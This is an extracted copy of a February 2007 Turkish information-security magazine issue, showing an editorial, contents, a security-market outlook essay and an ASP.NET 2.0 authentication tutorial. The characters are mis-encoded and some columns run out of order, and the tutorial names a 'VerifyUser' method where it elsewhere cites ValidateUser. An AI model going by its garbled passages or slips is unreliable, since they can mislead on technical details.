ABONE SiSTEMiMiZ DE⁄ifiiYOR

Transkript

B‹LG‹ GÜVENL‹G‹ PLATFORMU
syf: 3
ABONE
SiSTEM
DE⁄ifiiYiMiZ
OR
LÜTFE
KAYIT N
OLUN
• B‹LG‹ S‹STEMLER‹ VE R‹SK YÖNET‹M‹ • MICROSOFT GÜVENL‹K STRATEJ‹S‹
• MCAFEE S‹STEM GÜVEN‹K YÖNET‹M‹ • DATA LOSS PREVENTION
• CAPTCHA • VISTA GÜVENL‹⁄‹ • UNDERGROUND
Abone sistemimiz de¤ifliyor,
lütfen kay›t olun...
fiubat 2007
‹mtiyaz Sahibi
Sinan Y›lmaz
Sorumlu Müdür
Erkan fien
Yay›n Dan›flman›
Mehmet Ersin Da¤l›
Yay›n Kurulu
Caner Da¤l›, Erkan fien,
Serkan Akcan, Sinan Y›lmaz
Editor
Attila Bilir
Grafik Tasar›m
Erden Gümüflçü
‹dari ‹fller Koordinatörü
Serkan Akcan
Bu Say›ya Katk›da Bulunanlar
Arma¤an Zalo¤lu, Bora Dal, Cankat Domaniç,
Coflkun Kamilo¤lu, Erkan fien, Esra Mutlu,
Göksel Topbafl, Hakan Ünsal, Mehmet Üner,
Mehmet Emre, Murat Lostar, Murat Özdemir,
Serkan Akcan, Serkan Ak›n, Sinan Y›lmaz,
Tunç Çokkeser, Tunç Günergün, Umut Ayd›n
‹LAN
Yönetim Yeri
Mecidiyeköy ‹fl Merkezi fiehit Ahmet Sokak
No:4 Kat:12 D:121 Mecidiyeköy / ‹stanbul
www.beyazsapka.org
[email protected]
De¤erli okurumuz,
Öncelikle Beyaz fiapka projemize gösterdi¤iniz yo¤un ilgi için teflekkür ederiz.
Türkiye’de bilgi güvenli¤ine katk›da bulunmak hepimize sonsuz bir mutluluk veriyor. Beyaz fiapka, destekleriniz sayesinde içeri¤ini gelifltirerek büyümeye devam
edecek.
Düflündü¤ümüzden çok daha h›zl› büyüyen Beyaz fiapka’n›n abonelik sistemini yönetmekte baz› zorluklar yaflamaya bafllad›k. Her say›da ortalama 50 kadar abonemiz ifl ya da adres de¤ifltiriyor. Yine her say›da ortalama 200 kadar yeni abone
baflvurusu al›yoruz. Ayr›ca abonelerimizden Beyaz fiapka’y› etkileflimli bir altyap›yla bilgi güvenli¤i uzmanlar›n› bir araya getirmemiz gerekti¤ini belirten onlarca
elektronik posta ald›k. Dolay›s› ile abonelik sistemimizde de¤ifliklik yap›yoruz.
Dergi da¤›t›m listesinin yönetimini kolaylaflt›rmak için her Beyaz fiapka abonesinin internet sitemizden yeniden kay›t olmas›n› bekliyoruz. Kay›t s›ras›nda her
abonemize bir kullan›c› ad› ve flifre verece¤iz. May›s 2007 say›s›ndan itibaren,
web sitemizde kay›t yaratmam›fl kiflilere maalesef dergi gönderimi yapamayaca¤›z. Beyaz fiapka abonelerimiz bu sistem sayesinde ifl ve adres de¤iflikliklerini
web sitemizden kendileri yapabilecekler. Dolay›s› ile sizlerden web sitemizden
yeni abone kayd› yaratman›z› rica ediyoruz.
Hepimizin tek amac› sistemlerimizin ya da müflterilerimizin güvenli¤ini sa¤lamak…
Ancak tüm bunlar›n ötesinde hepimizin sosyal sorumluklar› oldu¤una inan›yoruz.
Ülkemizin ihtiyaç duydu¤u konularda sosyal yard›mlaflmay› desteklemeyi bir görev biliyoruz. Bu sebeple dergimizin her say›s›nda sosyal sorumluluk projelerine
yer verece¤iz.
Bask›
Promat Bas›m Yay›n San ve Tic A.fi.
Tel: (212) 456 63 63
Adile Naflit Bulvar› 122. Sokak No:8
34513 Esenyurt ‹STANBUL
Her zaman söyledi¤imiz gibi lütfen fikirlerinizi bizimle paylafl›n. Çünkü Beyaz fiapka hepimizin...
Yay›n Türü
Yayg›n Süreli, 3 Ayda bir yay›nlan›r
içindekiler
ÜCRETS‹ZD‹R, PARA ‹LE SATILMAZ.
04 >> Bilgi Güvenli¤inde Vizyon
Türkiye’de bilgi güvenli¤i pazar›n›n gelece¤i
Ana Sponsorlar
nebula
Beyaz fiapka Yönetimi
[email protected]
06 >> Web Projelerinde Kimlik Do¤rulama
ve Rol Tabanl› Yetkilendirme
Web uygulamalar›nda h›zl› ve güvenilir
hesap yönetimi
Kat›l›mc› Sponsorlar
Web Sitesi Tasar›m ve Programlamas›
Da¤›t›m
Aktif Da¤›t›m ‹letiflim Hizmetleri
Pazarlama San ve Tic A.fi.
Beyaz fiapka…
ücretsiz olarak abonelerine da¤›t›l›r
marka ba¤›ms›zd›r
sayfalar› okuyucular›na aç›kt›r
bilgiye yöneliktir
bilgi güvenli¤ine önem veren
sponsorlar›n›n katk›s› ile okuyucular›na ulafl›r
üç ayda bir yay›nlan›r
Nebula Biliflim Sistemleri San ve Tic Ltd fiti
taraf›ndan ücretsiz da¤›t›l›r.
28 >> A¤ ve Uygulama H›zland›rma
Wide Area Network yap›s›nda mevcut
iletiflimi ve uygulamalar› h›zland›rmak
30 >> Forefront Security for Exchange
Server
Microsoft Exchange alt yap›lar›na etkin ve
yüksek performansl› güvenlik çözümü
10 >> McAfee Sistem Güvenlik Yönetimi
McAfee’nin merkezi güvenlik yönetim,
politika yürütme ve raporlama arac›, ePO
32 >> Data Loss Prevention
DLP nedir? Ne de¤ildir?
14 >> Biliflim Sistemeleri ve Risk Yönetimi
Biliflim sistemlerinde risk de¤erlendirmesi
34 >> CAPTCHA
Basit tasarlanm›fl web güvenli¤i
16 >> Windows Vista Güvenlik Özellikleri
Vista’n›n 4 ana bafll›kta toplanm›fl geliflmifl
güvenlik teknolojileri
35 >> Güvenlik Portal›na Davet
Türkçe bilgi güvenli¤i portal› guvenlik.info
20 >> Underground
MSF ile atak simülasyonu
36 >> Microsoft Certificate Lifecycle
Manager
Microsoft’un yeni sertifika yönetim arac›
22 >> Microsoft Güvenlik Stratejisi
Microsoft’un güvenlik teknolojilerine bak›fl›
38 >> Bilgi Güvenli¤inde Kapsam Seçimi
BGYS kurman›n ilk ad›m›
24 >> Sizde “Sanctum” var m›?
Etkin bir veritaban› güvenli¤i sistemi modeli
39 >> KISA...KISA...KISA
Sektörden haberler
flubat 2007 beyazflapka 03
Serkan AKCAN
[email protected]
Bilgi Güvenli¤inde Vizyon
üphesiz vizyon sahibi kifliler ve kurumlar›n baflar›ya ulaflma ihtimalleri di¤erlerine göre daha yüksektir. Ancak vizyon tan›m› farkl› mecralarda farkl› anlamlar tafl›yabiliyor.
Örne¤in üniversitelerin iflletme derslerinin ço¤unda vizyonun bireysel bir görüfl bütünü oldu¤u, flirketlerin ya da organizasyonlar›n vizyonu olamayaca¤› söylenir. Oysa ifl dan›flmanlar› Kurumsal Vizyon gelifltirme hizmetleri vermektedir. Kurumsal dan›flmanlar vizyonu genelde ikiye ay›r›r: flimdiki vizyon ve
gelecek vizyonu. Ben en iyisi “vizyon sahibi” kavram› üzerinde
duray›m, kavram›n da Türk Dil Kurumu sözlü¤ünde nas›l geçti¤ini yazay›m.
fi
Vizyon Sahibi: Genifl görüfllü, ileri görüfllü, ufku genifl kimse.
Vizyon ile bilgi güvenli¤i aras›ndaki ba¤lant›y› 3 temel ad›mda
ortaya koyabiliriz.
Üretici Vizyonu
Üreticiler bilgi güvenli¤inde gelecek zamanlarda ortaya ç›kacak
tehditleri düflünür ve ürünlerini bu yönde gelifltirir. Ancak bu
sayede müflterilerine katma de¤erli hizmetler üretebilirler. Pazar araflt›rmalar› ile yat›r›m karar› desteklenir ve ürünler piyasaya sürülür.
‹fl Orta¤› Vizyonu
Biz hem üreticilerin hem de müflterilerimizin ifl orta¤›y›z. Bizim
gibi biliflim sektörünün hizmet taraf›nda bulunan flirketlerin belki de tek hedefi müflteri memnuniyetidir (en az›ndan bence öyle olmal›d›r). Ancak müflteri memnuniyeti bir sonuçtur, müflteriyi gelecek teknolojilere haz›rlamak ve bu konuda donan›ml› olmak ön flartt›r.
Son Kullan›c› Vizyonu
Türkiye’de en zay›f halka olarak gördü¤üm konu, son kullan›c›
vizyonu. Ticaret flekli ve yasal düzenlemeler (ihale kanunlar›,
sat›n alma prosedürleri vs.), ço¤u zaman flirketlerin teknoloji
al›mlar›ndaki vizyonunu arka plana itiyor. 10 y›l› aflk›n biliflim
sektörü tecrübemde mevcut kurallar sebebi ile son kullan›c›lardaki teknik uzmanlar›n istemedikleri ürün, teknoloji veya hizmetleri sat›n almak zorunda kald›¤›n› defalarca gördüm.
Benim sorumlulu¤um elbette daha çok ifl ortaklar›n›n vizyonu
çerçevesinde. Bugünkü vizyonumuz için Network IPS, Host IPS,
SSLVPN, Security Management, 2 Factor Authentication, Vulnerability Assessment ve Risk Management gibi oldukça yüklü
bir teknoloji yat›r›m› yapt›k ve bu ürünlerin tamam›n› kullan›yoruz. Tek amac›m›z teknik ekibimizin bilgi ve tecrübesini maksimum seviyede tutmak. Gelecek vizyonumuz ise yar›n talep edilecek ürün ve hizmetleri tespit etmek, gerekli yat›r›mlar› yapmak ve yar›nlara flimdiden haz›r olmak üzerine kurulu.
04 beyazflapka flubat 2007
Bu yaz›da “Bilgi Güvenli¤i” konusunda gelecek vizyonuna nas›l
bakt›¤›m› anlatmaya çal›flay›m dedim ama biraz uzun bir önsöz
oldu. Gelecek zamanlarda karfl›m›za ç›kacak olan tehditleri ve bu
tehditlerle nas›l mücadele edece¤imizi düflünmek, bu alanlara yat›r›m yaparak müflterilerimize do¤ru çözümler sunmak zorunday›m. Hepimiz bu konuda düflünmeliyiz, çünkü flirketimizin yar›nlar›n› ancak bu sayede güvende tutabiliriz. 2007 y›l›n›n bu ilk
günlerinde bizce güvenlik teknolojilerinin nas›l bir gelece¤e sahip
oldu¤unu ve Türkiye pazar›n›n mevcut teknolojilere adaptasyon
sürecini bir beyin f›rt›nas› yaparak ortaya koymaya çal›flal›m.
Beyaz fiapka’n›n önceki say›lar›nda da yer ald›¤› gibi, ataklar a¤
ve uygulama seviyesine do¤ru kayd›. Yani güvenli¤imizin bu taraf›na biraz daha öncelik vermeliyiz. A¤ seviyesinde Network
IPS projeleri h›zla yürümeye devam ediyor ama uygulama güvenli¤i taraf›nda büyük bir geliflme yok. 2007 y›l›nda uygulama
güvenli¤i taraf›nda güvenli kod gelifltirme, Application Firewall
ve uygulama güvenlik taramas› hizmetlerinde önemli art›fllar
bekliyorum. Network IPS ürünleri biraz daha küçük sistemlerde
projelendirilecek diye umarken Application Firewall teknolojilerinin büyük flirketlere h›zla girece¤ini san›yorum. Sektörün üretici taraf›nda ise önemli güvenlik üreticilerinin Application Firewall ürünleri gelifltirmesi ya da var olan baflka flirketleri sat›n almas› beni flafl›rtmayacak. Hatta birkaç sene sonra Network IPS
teknolojisi ile Application Firewall teknolojisinin ya da Network
Firewall ile Application Firewall ürünlerinin ayn› donan›mlar
üzerinde birlikte çal›flt›¤›n› görürsek flafl›rmayal›m.
Klasik Network Firewall ürünleri güvenlik sa¤lamakta çok yeterli de¤ildir. Y›llard›r bunu söyleyip dururken, Unified Threat
Management (UTM) ürünleri h›zla yay›l›p beni hakl› ç›kard›.
UTM cihazlar› tek kutu üzerinde Firewall, IPS, Antivirus ve Antispam gibi teknolojileri çal›flt›rabiliyor. Ancak her zaman söyledi¤im gibi, UTM cihazlar›n›n her bir özelli¤i k›s›tland›r›lm›flt›r.
Dolay›s› ile UTM cihazlar› daha ziyada küçük sistemlere yay›lacak, büyük sistemlerde her bir güvenlik teknolojisi ayr› ürünler
olarak çal›flacak.
Secure Content Management (SCM) ad›na henüz Türkiye al›flamad›. Hala birço¤umuz bu ürünlere ‘gateway antivirus’ gözüyle
bak›yoruz. Ancak bilgi güvenli¤i sektöründe SCM art›k bir ürün
grubu haline geldi. Hatta global araflt›rma flirketleri SCM ürün
grubu için pazar araflt›rmalar› yapar oldu.
SCM a¤›m›zda önemli bir güvenlik noktas› oluflturuyor. Elektronik posta sunucular›m›z›n yükünü %70 oran›nda azalt›yor.
HTTP, FTP ve POP3 gibi protokollerden do¤an ataklar› engelleyebiliyor. Önümüzdeki aylarda SCM ürünlerine basit atak engelleme imzalar› eklenebilir. Hatta önümüzdeki y›llarda SCM ürünleri büyük sistemler için spesifik protokollerde çal›flmak üzere
tasarlanabilir. Örne¤in sadece SMTP için çok daha geliflmifl
SCM, sadece HTTP için çok daha geliflmifl SCM gibi...
Spam postalar hepimizin ortak derdi. Ba¤›ms›z Antispam ürünleri de var, SCM ürünlerine entegre ürünler de. Spam mücadelesinde Karantina Yönetimi a¤›rl›k kazanacak. Her ne kadar
spam tan›mlama baflar›s› günden güne artsa da, bu ifle internet
otoritelerinin kesin bir çözüm getirmesi gerekti¤ini ve getirece¤ini düflünüyorum. Microsoft, Sender Policy Framework (SFP)
ile bu konuda bir ad›m att› ancak biliflim sektörü bunu çok hazmetmifl gibi görünmüyor. Ben daha ziyade dijital imza temelli
bir kesin çözüm ortaya konaca¤›na inan›yorum. Ancak bu çok
yak›n bir gelecekte olmayacakt›r.
Google’dan bilgi güvenli¤i harcamalar› ile ilgili bir araflt›rma
yapt›m. Özellikle kuzey Amerika’da kimlik do¤rulama teknolojilerinin sat›fl rakamlar› flafl›rt›c› derecede yüksek. Nedeni ise çok
basit: güvenlik ihlallerinin çok büyük bölümü zay›f flifre politikas›, zay›f kimlik denetimi nedeniyle ortaya ç›k›yor. Sadece kimlik
do¤rulama olarak baksak bile ürünler çok ucuz yaz›lmaz. Kullan›c› bafl›na 50-100$ gibi maliyetler söz konusu olabiliyor. Ancak
sisteme eriflim bilgilerimiz bu rakamdan daha düflük bir öneme
sahip de¤il ki? Single Sign-On (SSO) çözümlerini düflünürsek
maliyet daha da artabilir. Yine de Türkiye’de pek de¤erini bulamam›fl olan kimlik do¤rulama çözümlerinin 2007 y›l› içerisinde
önemli derecede artaca¤›n› düflünüyorum.
ADSL hizmetinin yay›lmas› ile internet kullan›c›s› say›s› önemli
derecede artt›. Eskiden sadece bir web sunucusu ile yürütülen
hizmetler art›k dört-befl sunucu ile yap›l›yor. Metro Ethernet altyap›s› bant geniflliklerini önemli derecede artt›rmaya bafllad›. Load Balancing ve SSL Acceleration taraf›nda yap›lan projeler zaten 2006 y›l›nda artmaya bafllad›. 2007 y›l›nda Application Acceleration çözümlerinin de h›zla artarak yay›laca¤›n› düflünüyorum.
Dünyan›n en büyük kurumsal dan›flmanl›k flirketlerinden birinin
çal›flan›, dünyan›n en büyük biliflim üreticilerinden birinin çal›flanlar›na ait önemli bilgiler tafl›yan CD’yi çald›rd›. Türkiye’de bu
h›rs›zl›¤›n önemi çok anlafl›lamayabilir. Fakat Amerikan kanunlar›na göre bu bilgilerin çal›nmas›, sat›lmas› ve kullan›lmas› çok
büyük bir suç. Benzer durumlar Türk flirketlerinde de oluyor.
Bugüne kadar proje dokümanlar›n› çald›rm›fl, önemli dokümanlar›n bir köstebek taraf›ndan s›zd›r›ld›¤›n› düflünen, dizüstü bilgisayar›n› çald›rm›fl ve içerisinde önemli bilgiler oldu¤unu söyleyen yüzlerce müflteri gördüm. Bu gibi s›k›nt›lara bilgi güvenli¤i üreticileri çözüm getirmifl durumda. 2007 y›l›ndan itibaren
hayat›m›za yeni bir güvenlik teknolojisi girecek, Data Loss Prevention (DLP). DLP ürünleri bilgisayarlarda bulunan gizli ve kritik bilgilerin d›fl ortamlara tafl›nmas›n› engelliyor. DLP ile korunan bilgileri CD’ye ya da USB belleklere kopyalamak, e-posta eki
olarak baflkalar›na göndermek, an›nda mesajlaflma yaz›l›mlar›
ile baflka sistemlere transfer etmek, yazd›r›lmas›n› ya da fakslanmas›n› engellemek mümkün.
NAC teknolojisi sürekli kafamda soru iflareti uyand›r›yor. Managed ve unmanaged sistemlerde NAC teknolojisini yürütmek çok
zor. Ben en bafl›ndan beri NAC teknolojisinin çok yay›lamayaca¤›n› düflündüm. Microsoft bu ifle elini att›¤›nda iflin çehresi bir
miktar de¤iflecek gibi. Longhorn ile gelecek olan Microsoft NAP
sektörde bir standart haline gelebilir. Yine de NAC ürünlerinin,
harcanan iflletim eme¤ine karfl›l›k gelebilecek bir fayda yaratt›¤›n› düflünmüyorum ve her müflteride söyledi¤im laf›m› bu sayfada sizlerle paylaflmak istiyorum: Prevention First!
Türkiye’de ne kadar pazara sahip olaca¤›n› kestiremedi¤im bir
tek ürün grubu var, o da Policy Management (Policy Auditing ve
Compliance Analysis gibi isimleri de bu kategoriye dahil ediyorum). Güvenlik ve kural denetimi yapan bu ürünler genifl bir tabanda denetim ve raporlama yapabiliyor. Ancak nedendir bilinmez, Türkiye pazar› bu tarz ürünlere pek s›cak bakm›yor. Özellikle Amerikan flirketleri pek gönüllü olmasalar da bu ürünleri
kullanmak zorunda kal›yor. Nitekim HIPAA, SOX, PCI gibi onlarca uyulmas› gereken ve s›k› denetimi yap›lan standart var ve bu
ürünler standartlar›n tamam›na uyum sa¤layan denetimler yapabiliyor, raporlar üretebiliyor. Türkiye’de özellikle Finans gibi
sektörel denetim sistemi geliflmifl pazarlarda bu gibi yaz›l›mlar
kullan›lacakt›r diye düflünüyorum.
Ne kadar çok üründen ve teknolojiden bahsettik de¤il mi? Kim
yönetecek bunca ürünü, kim raporlayacak? Güvenlik sistemleri
gelifltikçe ve kullan›lan ürün say›s› artt›kça mecburen Enterprise Security Management (ESM) ürünlerine yönelece¤iz, baflka
çaremiz yok. ESM ürünleri farkl› ifller yapan birçok biliflim ve güvenlik sisteminden bilgi toplay›p yorumluyor ve bize anlaml› raporlar üretebiliyor. ESM sayesinde tek merkezden risk haritam›z› görüp acil önlemler üretebiliyoruz.
Bu yaz›ma s›¤d›ramad›¤›m Automated Remedition, Risk Management, Mobile Device Security, Encryption gibi konular da var.
Ancak temelde anlatmaya çal›flt›¤›m fley flu ki; her birimiz çal›flt›¤›m›z kurumun güvenli¤ini sa¤lamakla yükümlüyüz. Sorumluluklar paylaflt›r›labilir ancak devredilemez. Yar›n›n risklerini bugünden düflünmek, sistemimizin ve flirketimizin gelece¤ini garanti alt›na alacakt›r. Bu sayede kolay kazan›lamayan para, daha mant›kl› yat›r›mlara kayd›r›labilir ve yat›r›m geri dönüfl h›z›
artt›r›labilir. Biliflim güvenli¤ini sa¤laman›n rahatl›¤› bir köflede
dursun, güvenilir sistemlerimiz sayesinde müflterilerimizin
memnuniyetini artt›rabilir, çetin rekabet koflullar›nda rakiplerimizden bir ad›m ileride olabiliriz.
Yar›nlar›n›z güvenli olsun.
Mehmet EMRE
[email protected]
ASP.NET 2.0
Web Projelerinde Kimlik Do¤rulama ve
Rol Tabanl› Yetkilendirme
elifltirdi¤imiz web projelerinin birço¤unda ortak ifllevsellik olarak, kimlik do¤rulaman›n oldu¤unu görürüz. Kimlik do¤rulama, site ziyaretçilerine özellefltirilmifl servisler sunmam›z ve site içinde sundu¤umuz bu
ifllevselli¤i yetkilendirmemizi mümkün k›lar. Birçok web sitesinde anonim kullan›c›lar ve kay›tl› kullan›c›lar›n web sitesi
içinde kullanabilecekleri ifllevsellik farkl›d›r. Anonim kullan›c›lara k›s›tl› bir ifllevsellik seti sunulurken, kay›tl› kullan›c›lara çok daha zengin seçenekler sunulmaktad›r.
G
Web sitemize basit anlamda bir kimlik do¤rulama ve yetkilendirme ifllevselli¤i eklemek için her projemizde baz› ad›mlar izleriz:
• Kullan›c› kimlik bilgilerinin tutuldu¤u bir veritaban› tablosunun oluflturulmas›
• Kullan›c› kimlik bilgilerinin (Kullan›c› kodu, flifre vb) al›nd›¤› ve kullan›c› tablosundaki bilgiler do¤rultusunda do¤ruland›¤› bir kimlik do¤rulama sayfas›
• Kay›tl› kullan›c›lar için sunulan site üzerinde kullan›c› dolafl›rken, ilgili kullan›c›n›n kimlik bilgilerinin o oturum için do¤rulanm›fl oldu¤unu kay›t alt›na alan bir sistemin oluflturulmas›
• Kay›tl› kullan›c›lar taraf›ndan ziyaret edilebilecek sayfalar›n sisteme girilmesi ve yetkilendirmenin yap›lmas›
• ‹ste¤e ba¤l› olarak anonim kullan›c›lar›n siteye kay›t olabilmeleri için yeni kullan›c› oluflturma ifllevselli¤inin sa¤lanmas›
• Site yöneticilerinin kay›tl› kullan›c›lar ile ilgili yönetimsel ifllemleri yapabildikleri bir yap›n›n kurulmas›
rak kald›. ASP.NET 2.0 ile gelen üyelik sistemi (Membership
System) ve bununla ilintili çal›flan web kontrolleri yukar›da
ad›m ad›m s›ralad›¤›m›z tüm ifllemleri çok kolay bir flekilde
yapmam›z için ihtiyaç duydu¤umuz alt yap›y› bizlere sunmakta.
Form Tabanl› Kimlik Do¤rulama – ‹lk Ad›m
ASP.NET öncesi web yaz›l›mc›lar› kimlik do¤rulama ve yetkilendirmeyle ilgili tasar›m kararlar›n› kendileri almak ve bunlar› uygulamak durumundayd›lar. Örnek vermek gerekirse,
sistemde tan›ml› bir kullan›c› kodu ve flifresiyle sisteme girifl
yapan ve kimlik bilgileri do¤rulanan bir kullan›c›n›n sitede
dolafl›rken kimlik do¤rulamadan geçti¤i bilgisinin, di¤er bir
ifadeyle kay›tl› kullan›c› oturum bilgisinin, sistemde bir flekilde tutulmas› gerekmekteydi. Yap›lmas› gereken ifllerden biri de siteye girifl yap›ld›ktan sonra ilgili kullan›c›n›n yetkilerinin tutulmas›, bu yetkiler do¤rultusunda web sitesinin ilgili
ifllevselli¤ini kullanabilmesini sa¤lamak için gerekli kod, yaz›l›mc›lar taraf›ndan tasarlanmak ve yaz›lmak durumdayd›.
Bu, ASP.NET öncesinde tan›mlanan bir oturum de¤iflkeni
(Session Variable) tutularak ve her sayfa bafl›nda bu oturum
de¤iflkeni yard›m›yla kullan›c›n›n kimlik do¤rulamadan geçip
geçmemesi kontrol edilerek yap›l›rd›. Yine her sayfa giriflinde yaz›lan kodlar ile kullan›c›n›n bu sayfay› görüntülemeye
yetkili olup olmad›¤› belirlenirdi.
ASP.NET 1.0 ve 1.1 ile gelen form tabanl› kimlik do¤rulama
(Forms-based authentication) kullan›c› hesaplar›n›n kolay
bir flekilde uygulanmas›n› ve yetkilendirme bilgisinin, web
uygulamas›n›n konfigürasyon dosyas› içinde (web.config)
tutulmas›n› mümkün k›ld›. Form tabanl› kimlik do¤rulamada
oluflturulan do¤rulama bileti (Authentication Ticket), kullan›c›n›n internet taray›c›s› üzerinde çerez içinde tutularak siteyi ziyaret eden kiflinin farkl› sayfalar aras›nda dolafl›rken
kimlik bilgilerinin tafl›nmas›n› mümkün k›lar. FormsAuthentication s›n›f› da sundu¤u metodlarla do¤rulama bileti al›nmas›n› ve bunun site ç›k›fl›nda yok edilmesini sa¤lar.
ASP.NET 1.0 ve 1.1 ile gelen form tabanl› kimlik do¤rulama,
web sitelerinin bu ihtiyaçlar›n› karfl›lamak için standart bir
yaklafl›m getirmekle beraber bu konuda yap›lmas› gereken
birçok iflin tasar›m ve kodlamas› yaz›l›mc›lara b›rakm›flt›r.
Örnek vermek gerekirse, kullan›c› kimlik ve flifre bilgilerinin
tutulaca¤› veritaban› tablosunun tasar›m› ve oluflturulmas›,
veritaban› tablosundaki bilgilerin güvenli bir flekilde saklanmas› vb. gibi.
ASP.NET 2.0 Üyelik Sistemi
ASP.NET 2.0 ile gelen üyelik sistemiyle daha önce ASP.NET
1.0 ve 1.1 ‘de ortaya konulan form tabanl› kimlik do¤rulama
sisteminin üzerine yeni eklentiler getirilmifltir. ASP.NET 2.0
ile birlikte kullan›c› oluflturma, silme ve güncelleme ifllemlerinin programatik olarak yap›lmas› ve bu ifllemlerin haz›r
olarak gelen web kontrolleriyle desteklenmesi sa¤lanm›flt›r.
Böyle bak›ld›¤›nda ASP.NET 2.0 ile gelen yenilikler yeni üyelik uygulama gelifltirme arabirimleri (Membership API) ve
güvenlik web kontrolleri olarak özetlenebilir.
Üyelik uygulama gelifltirme arabirimleri (Membership API)
sa¤lay›c› modeli (provider model) üzerine oturtulmufltur. Bu
da arabirimlerin tan›mlamalar› sabit kalmak kayd›yla uygulaman›n istenildi¤inde özellefltirilebilece¤i anlam›na gelmektedir. Özellikle bilgilerin fakl› veri kaynaklar› üzerinde tutulabilmesi aç›s›ndan bu önemlidir.
Membership s›n›f›n›n CreateUser(), GetAllUsers(), ValidateUser()vb. birçok metodu bulunmaktad›r. Uygulamada kullan›lacak Membership s›n›f› web uygulamas›n›n konfigürasyon dosyas› taraf›ndan belirlenir. Özellefltirilmifl bir Mem-
Yukar›da bahsetti¤imiz maddeler bir web sitesi için kimlik
do¤rulama ve yetkilendirme mekanizmas›n›n oluflturulmas›nda yap›lmas› gereken temel ifllemleri özetlemektedir.
Farkl› projelerde, ifl gereksinimleri do¤rultusunda bu ifllemler detaylanabilir.
ASP.NET öncesinde yaz›l›mc›lar, yukar›daki mekanizmalar›n
tamam›n› kendileri oluflturmak durumundayd›lar. ASP.NET
form tabanl› kimlik tan›ma (Forms-based authentication)
sistemi ve FormsAuthentication s›n›f› sayesinde kimlik do¤rulama ve siteye girifl-ç›k›fl ifllemleri oldukça kolaylaflt›.
ASP.NET ile gelen form tabanl› kimlik tan›ma, hayat›m›z› oldukça kolaylaflt›rmas›na ra¤men kullan›c› tablosunun oluflturulmas›, kimlik do¤rulama sayfas›n›n kodlanmas› (Login
Page) gibi ifller hala yaz›l›mc›n›n yapmas› gereken ifller ola-
ASP.NET 2.0
Web Projelerinde Kimlik Do¤rulama ve
Rol Tabanl› Yetkilendirme
bership yap›s›n› konfigürasyon dosyas›nda yap›lacak de¤iflikliklerle kullanmak mümkündür. ASP.NET 2.0; do¤rudan
kullan›c› bilgilerini SQL Server veritaban›nda ya da Active
Directory üzerinde tutman›z› sa¤layacak Membership Provider ile gelmektedir. Mevcut projedeki kullan›c› veriniz fakl›
bir veri kayna¤›nda ise ya da yeni yapt›¤›n›z bir projedeki
kullan›c› verilerinizi farkl› bir kaynakta tutmak isterseniz size sa¤lanan alt yap›yla ilgili veri kayna¤›na yönelik bir Membership Provider yazman›z mümkün.
Kullan›c› Bilgilerinin Üyelik Sistemi ile SQL Server
Üzerinde Tutulmas›
l›r. Daha sonra Security Setup Wizard kullan›larak güvenlik
ayarlar› yap›labilir.
SqlMembershipProvider kullan›c› bilgilerini iki farkl› tablo
üzerinde tutar:
aspnet_Users: Her kay›tl› kullan›c› için bir sat›r tutulur. UserId sütunu, her kullan›c›n›n sistem içerisinde tekilli¤ini garanti alt›na al›r. UserId sütunu GUID olarak saklan›r.
aspnet_Membership: UserId sütunu ile aspnet_Users tablosuna ba¤lan›r. Detay üyelik sistemi bilgileri (e-posta, güvenlik sorusu/cevab› vb.) bilgileri bu tabloda tutulur.
ASP.NET 2.0 ile gelen Membership Provider‘lardan biri
SqlMembershipProvider’d›r. Bu provider seçildi¤inde, kullan›c› bilgileri SQL Server üzerinde tutulur. Öncelikli olarak
veritaban› flema do¤rultusunda oluflturulmal›d›r. Bunun için
iki farkl› yöntem uygulanabilir.
Güvenlik Web Kontrolleri
ASP.NET Web Site Administration Tool‘un kullan›m›. fiema
do¤rultusunda ASPNET.MDF dosyas› oluflturulup uygulaman›n App_Data dizinine koyulacakt›r.
ASP.NET 2.0 içinde yeni gelen sunucu web kontrollerinden
7 tanesi güvenlik amaçl›d›r ve üyelik sistemi içinde kullan›c›
tan›mlamalar› yapmam›z› kolaylaflt›r›r.
ASP.NET SQL Server Registration Tool (aspnet_regsql.exe)
komut sat›r› kullan›larak çal›flt›r›labilir. Böylelikle istenen
SQL Server 2000 veya 2005 sunucusu üzerinde kullan›c›
tablosu oluflturulabilir.
Bu kontrollere k›saca bakacak olursak
Login
ASP.NET Web Site Administration Tool; Visual Studio 2005
içinden WebSite ASP.NET Configuration seçilerek kullan›-
ASP.NET 2.0 ile birçok yeni web kontrolü gelmifltir. Burada
hedef, birçok web projesinde tekrarlanarak yaz›lan kodlar›n
web kontolleri içinde yaz›l›mc›ya sunulmas› ve yaz›l›mc› verimlili¤inin artt›r›lmas›d›r.
Login kontrolü, standart kullan›c› ad› ve kodu ile siteye girifl
yapmay› sa¤layan bir kontroldür. Log In dü¤mesine bas›ld›¤›nda Membership s›n›f›n›n VerifyUser (username, password) metodu çal›fl›r ve kimlik do¤rulama sa¤lan›r. E¤er verilen bilgiler do¤ru ise kullan›c›ya bir do¤rulama bileti sa¤lan›r, de¤ilse hata yine kontrolün kullan›c› arabirimi üzerinden
dönülür. Kullan›c› bilgilerinin do¤ru olmad›¤› durumlarda
özellefltirilmifl aksiyonlar› alabilmek için LoginError Event
kullan›labilir. Özellefltirilmifl kimlik do¤rulama mekanizmalar› oluflturmak için Authenticate Event kullan›labilir.
lan›c›n›n kay›tl› bir kullan›c› ya da anonim bir kullan›c› olma
durumuna göre ilgili flablon üzerindeki içerik kullan›c›ya
yönlendirilir.
PasswordRecovery
Bu kontrol, kay›tl› herhangi bir kullan›c›ya mevcut flifresinin
ya da yeniledi¤i flifresinin gönderilmesini sa¤lar.
LoginSatatus
Bu kontrol, sitede anonim bir kullan›c› o anda aktif ise, login
sayfas›na bir ba¤lant› içerir. Aktif kullan›c› kay›tl› ve kimlik
kontrolünden geçmifl bir kullan›c› ise bu durumda siteden ç›k›fl (Logoff) linki gösterilir.
CreateUserWizard
Kullan›c› kodu ve flifresi ile girilen sitelerde genellikle bir de
yeni kullan›c› oluflturma ekran›na ihtiyaç duyar›z. CreateUserWizard kontrolü, yeni kullan›c› oluflturma arayüzünü
yazmam›z› oldukça kolaylaflt›r›r. Arkaplanda Membership s›n›f› CreateUser(...) metodu ça¤›r›l›r ve üyelik sistemi üzerinde kullan›c› oluflturma gerçeklefltirilir.
Sonuç
LoginName
Bu kontrol, hiç kod yazmaks›z›n aktif kullan›c› ismini almam›z› sa¤lar. Ayn› fley User.Identity.Name API kullan›larak
programatik olarak gerçeklefltirilebilir.
ChangePassword
Bu kontrol, kullan›c›lar›n flifrelerini de¤ifltirmelerini sa¤lar.
